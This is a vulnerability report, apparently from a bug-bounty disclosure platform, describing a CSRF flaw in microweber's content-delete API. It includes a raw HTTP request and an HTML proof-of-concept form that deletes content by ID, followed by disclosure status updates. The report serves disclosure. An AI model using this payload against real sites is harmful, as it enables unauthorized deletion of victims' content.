Cross-Site Request Forgery (CSRF) in microweber/microweber
Valid
Reported on
Jan 19th 2022
Description
CSRF issues deleting the content of the website since it is having no CSRF token validation.
Request
POST /demo/api/content/delete HTTP/1.1
Host: demo.microweber.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 12
Origin: https://demo.microweber.org
Connection: close
Referer: https://demo.microweber.org/demo/admin/view:content
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
ids%5B%5D=21
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
<input type="hidden" name="ids[]" value="21" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact
This vulnerability is capable of enabling an attacker to delete any content without authorization.
We are processing your report and will contact the
microweber
team within 24 hours.
a year ago
We have contacted a member of the
microweber
team and are waiting to hear back
a year ago
We have sent a
follow up to the
microweber
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
microweber
team.
We will try again in 10 days.
a year ago
to join this conversation